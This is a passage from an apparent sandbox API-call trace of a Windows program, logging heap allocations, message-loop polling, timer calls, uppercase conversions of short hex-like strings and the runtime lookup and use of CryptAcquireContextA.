lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15) returned 0x29f6f80 [0087.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0087.427] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextA") returned 0x763afc40 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6300 | out: hHeap=0x2af0000) returned 1 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0087.427] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0087.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.430] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.430] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0087.430] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0087.430] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.431] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0087.431] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.431] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.431] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0087.431] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.431] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.431] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.431] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.432] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.432] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.432] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0087.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0087.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.432] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0087.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.432] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0087.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0087.433] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0087.433] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0087.433] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0087.433] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0087.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0087.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0087.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.435] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.435] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.436] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.436] RtlAllocateHeap 